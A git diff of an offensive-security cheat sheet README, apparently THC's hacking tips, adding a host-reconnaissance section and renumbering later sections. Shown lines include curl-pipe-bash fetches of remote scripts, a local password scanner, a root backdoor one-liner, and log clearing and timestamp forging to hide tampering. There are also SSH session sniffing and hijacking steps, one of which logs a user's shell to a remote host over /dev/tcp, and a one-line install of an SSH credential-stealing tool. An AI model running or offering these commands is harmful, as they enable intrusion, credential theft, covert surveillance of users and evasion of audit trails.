diff --git a/README.md b/README.md
index 0a4481f..487f456 100644
--- a/README.md
+++ b/README.md
@@ -73,6 +73,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg)
1. [Remote access an entire network](#backdoor-network)
1. [Smallest PHP backdoor](#carriage-return-backdoor)
1. [Local Root backdoor](#ld-backdoor)
+1. [Host Recon](#hostrecon)
1. [Shell Hacks](#shell-hacks)
1. [Shred files (secure delete)](#shred)
1. [Restore the date of a file](#restore-timestamp)
@@ -1537,11 +1538,67 @@ Become root
/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 /usr/bin/python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'
```
+
+## 7. Host Recon
+---
+
+Get essential information about a host:
+```sh
+curl -fsSL https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/raw/master/tools/whatserver.sh | bash
+```
+
+Find out the Linux Distribution
+```sh
+uname -a; lsb_release -a 2>/dev/null; cat /etc/*release /etc/issue* /proc/version /etc/hosts 2>/dev/null
+```
+
+netstat if there is no netstat/ss/lsof:
+```sh
+curl -fsSL https://raw.githubusercontent.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/master/tools/awk_netstat.sh | bash
+```
+
+Speed check the system
+```sh
+curl -fsSL https://bench.sh | bash
+# Another speed check:
+# curl -fsSL https://yabs.sh | bash
+```
+
+Find all suid/sgid binaries:
+```
+find / -xdev -type f -perm /6000 -ls 2>/dev/null
+```
+
+Find all writeable directories:
+```sh
+wfind() {
+ local arr dir
+
+ arr=("$@")
+ while [[ ${#arr[@]} -gt 0 ]]; do
+ dir=${arr[${#arr[@]}-1]}
+ unset 'arr[${#arr[@]}-1]'
+ find "$dir" -maxdepth 1 -type d -writable -ls 2>/dev/null
+ IFS=$'\n' arr+=($(find "$dir" -mindepth 1 -maxdepth 1 -type d ! -writable 2>/dev/null))
+ done
+}
+# Usage: wfind /
+# Usage: wfind /etc /var /usr
+```
+
+Find local passwords:
+```sh
+curl -fsSL https://github.com/praetorian-inc/noseyparker/releases/download/v0.16.0/noseyparker-v0.16.0-x86_64-unknown-linux-gnu.tar.gz | tar xvfz - --transform="flags=r;s|.*/||" --no-anchored --wildcards noseyparker && \
+./noseyparker scan . && \
+./noseyparker report
+```
+(Or use [PassDetective](https://github.com/aydinnyunus/PassDetective) to find passwords in ~/.*history)
+
---
-## 7. Shell Hacks
+## 8. Shell Hacks
-**7.i. Shred & Erase a file**
+**8.i. Shred & Erase a file**
```sh
shred -z foobar.txt
@@ -1562,7 +1619,7 @@ Note: Or deploy your files in */dev/shm* directory so that no data is written to
Note: Or delete the file and then fill the entire harddrive with /dev/urandom and then rm -rf the dump file.
-**7.ii. Restore the date of a file**
+**8.ii. Restore the date of a file**
Let's say you have modified */etc/passwd* but the file date now shows that */etc/passwd* has been modifed. Use *touch* to change the file data to the date of another file (in this example, */etc/shadow*)
@@ -1571,7 +1628,7 @@ touch -r /etc/shadow /etc/passwd
```
-**7.iii. Clear logfile**
+**8.iii. Clear logfile**
This will reset the logfile to 0 without having to restart syslogd etc:
```sh
@@ -1588,7 +1645,7 @@ IFS="" a=$(sed "/${DEL}/d" <"${LOG}") && echo "$a">"${LOG}"
```
-**7.iv. Hide files from that User without root privileges**
+**8.iv. Hide files from that User without root privileges**
Our favorite working directory is */dev/shm/*. This location is volatile memory and will be lost on reboot. NO LOGZ == NO CRIME.
@@ -1615,51 +1672,11 @@ mkdir $'\t'
cd $'\t'
```
-
-**7.v. Find out Linux Distro**
-
-```sh
-# Find out Linux Distribution
-uname -a; lsb_release -a 2>/dev/null; cat /etc/*release /etc/issue* /proc/version /etc/hosts 2>/dev/null
-```
-
-```sh
-# Speed check the system
-curl -sL bench.sh | bash
-# Another speed check:
-# curl -sL yabs.sh | bash
-```
-
-
-**7.vi. Find +s files / Find writeable directory**
-
-Find all suid/sgid binaries:
-```
-find / -xdev -type f -perm /6000 -ls 2>/dev/null
-```
-
-Find all writeable directories:
-```sh
-wfind() {
- local arr dir
-
- arr=("$@")
- while [[ ${#arr[@]} -gt 0 ]]; do
- dir=${arr[${#arr[@]}-1]}
- unset 'arr[${#arr[@]}-1]'
- find "$dir" -maxdepth 1 -type d -writable -ls 2>/dev/null
- IFS=$'\n' arr+=($(find "$dir" -mindepth 1 -maxdepth 1 -type d ! -writable 2>/dev/null))
- done
-}
-# Usage: wfind /
-# Usage: wfind /etc /var /usr
-```
-
---
-## 8. Crypto
+## 9. Crypto
-**8.i. Generate quick random Password**
+**9.i. Generate quick random Password**
Good for quick passwords without human element.
@@ -1680,7 +1697,7 @@ head -c 32 < /dev/urandom | base64 | tr -dc '[:alnum:]' | head -c 16
```
-**8.ii.a. Linux transportable encrypted filesystems - cryptsetup**
+**9.ii.a. Linux transportable encrypted filesystems - cryptsetup**
Create a 256MB large encrypted file system. You will be prompted for a password.
@@ -1705,7 +1722,7 @@ umount /mnt/sec
cryptsetup close sec
```
-**8.ii.b. Linux transportable encrypted filesystems - EncFS**
+**9.ii.b. Linux transportable encrypted filesystems - EncFS**
Create ```.sec``` and store the encrypted data in ```.raw```:
```sh
@@ -1719,7 +1736,7 @@ fusermount -u .sec
```
-**8.iii Encrypting a file**
+**9.iii Encrypting a file**
Encrypt your 0-Days and log files before transfering them - please. (and pick your own password):
@@ -1735,9 +1752,9 @@ openssl enc -d -aes-256-cbc -pbkdf2 -k fOUGsg1BJdXPt0CY4I input.
---
-## 9. SSH Sniffing
+## 10. SSH Sniffing
-**9.i Sniff a user's SHELL session with script**
+**10.i Sniff a user's SHELL session with script**
A method to log the shell session of a user (who logged in via SSH).
@@ -1748,7 +1765,7 @@ echo 'exec script -qc /bin/bash ~/.ssh-log.txt' >>~/.profile
Consider using [zap-args](#bash-hide-arguments) to hide the the arguments and /dev/tcp/3.13.3.7/1524 as an output file to log to a remote host.
-**9.ii Sniff all SHELL sessions with dtrace - FreeBSD**
+**10.ii Sniff all SHELL sessions with dtrace - FreeBSD**
Especially useful for Solaris/SunOS and FreeBSD (pfSense). It uses kernel probes to trace *all* sshd processes.
@@ -1768,7 +1785,7 @@ Start a dtrace and log to /tmp/.log:
```
-**9.iii Sniff all SHELL sessions with eBPF - Linux**
+**10.iii Sniff all SHELL sessions with eBPF - Linux**
eBPF allows us to *safely* hook over 120,000 functions in the kernel. It's like a better "dtrace" but for Linux.
@@ -1781,7 +1798,7 @@ curl -o ptysnoop.bt -fsSL https://github.com/hackerschoice/bpfhacks/raw/main/pty
Check out our very own [eBPF tools to sniff sudo/su/ssh passwords](https://github.com/hackerschoice/bpfhacks).
-**9.iv Sniff a user's outgoing SSH session with strace**
+**10.iv Sniff a user's outgoing SSH session with strace**
```sh
strace -e trace=read -p 2>&1 | while read x; do echo "$x" | grep '^read.*= [1-9]$' | cut -f2 -d\"; done
```
@@ -1789,7 +1806,7 @@ Dirty way to monitor a user who is using *ssh* to connect to another host from a
-**9.v. Sniff a user's outgoing SSH session with a wrapper script**
+**10.v. Sniff a user's outgoing SSH session with a wrapper script**
Even dirtier method in case */proc/sys/kernel/yama/ptrace_scope* is set to 1 (strace will fail on already running SSH sessions)
@@ -1835,7 +1852,7 @@ To uninstall cut & paste this\033[0m:\033[1;36m
The SSH session will be sniffed and logged to *~/.ssh/logs/* the next time the user logs into his shell and uses SSH.
-**9.vi Sniff a user's outgoing SSH session using SSH-IT**
+**10.vi Sniff a user's outgoing SSH session using SSH-IT**
The easiest way is using [https://www.thc.org/ssh-it/](https://www.thc.org/ssh-it/).
@@ -1844,7 +1861,7 @@ bash -c "$(curl -fsSL https://thc.org/ssh-it/x)"
```
-**9.vii Hijack / Take-over a running SSH session**
+**10.vii Hijack / Take-over a running SSH session**
Use [https://github.com/nelhage/reptyr](https://github.com/nelhage/reptyr) to take over an existing SSH session:
```sh
@@ -1856,9 +1873,9 @@ ps ax -o pid,ppid,cmd | grep 'ssh '
---
-## 10. VPN & Shells
+## 11. VPN & Shells
-**10.i. Disposable Root Servers**
+**11.i. Disposable Root Servers**
```console
$ ssh root@segfault.net # Use password 'segfault'
@@ -1867,7 +1884,7 @@ $ ssh root@segfault.net # Use password 'segfault'
https://thc.org/segfault
-**10.ii. VPN/VPS/Proxies**
+**11.ii. VPN/VPS/Proxies**
Trusted VPN Providers
1. https://www.mullvad.net
@@ -1906,7 +1923,7 @@ Many other services (for free)
---
-## 11. Intelligence Gathering
+## 12. Intelligence Gathering
| OSINT Hacker Tools ||
| --- | --- |
@@ -1938,9 +1955,9 @@ Many other services (for free)
---
-## 12. Miscellaneous
+## 13. Miscellaneous
-**12.i. Tools of the trade**
+**13.i. Tools of the trade**
Comms
1. [CryptoStorm Email](https://www.cs.email/) - Disposable emails (send & receive). (List of [Disposable-email-services](https://github.com/AnarchoTechNYC/meta/wiki/Disposable-email-services])).
@@ -2052,13 +2069,13 @@ Mindmaps & Knowledge
1. [Active Directory](https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2022_11.svg)
-**12.ii. Cool Linux commands**
+**13.ii. Cool Linux commands**
1. https://jvns.ca/blog/2022/04/12/a-list-of-new-ish--command-line-tools/
1. https://github.com/ibraheemdev/modern-unix
-**12.iii. Tmux Cheat Sheet**
+**13.iii. Tmux Cheat Sheet**
| | Tmux Cheat Sheet |
@@ -2072,7 +2089,7 @@ Mindmaps & Knowledge
| Menu | `Ctrl+b` + `>`. Then use `Ctrl+b` + `UP`, `DOWN`, `LEFT` or `RIGHT` to move between the panes. |
-**12.iv. Useful commands**
+**13.iv. Useful commands**
Use `lsof -Pni` or `netstat -putan` (or `ss -putan`) to list all Internet (_-tu_) connections.
@@ -2097,7 +2114,7 @@ rlwrap --always-readline ssh user@host
```
---
-## 13. Other Sites
+## 14. Other Sites
1. [Phineas Fisher](https://blog.isosceles.com/phineas-fisher-hacktivism-and-magic-tricks/) - No nonsense. Direct. How we like it.
1. [Hacking HackingTeam - a HackBack](https://gist.github.com/jaredsburrows/9e121d2e5f1147ab12a696cf548b90b0) - Old but real talent at work.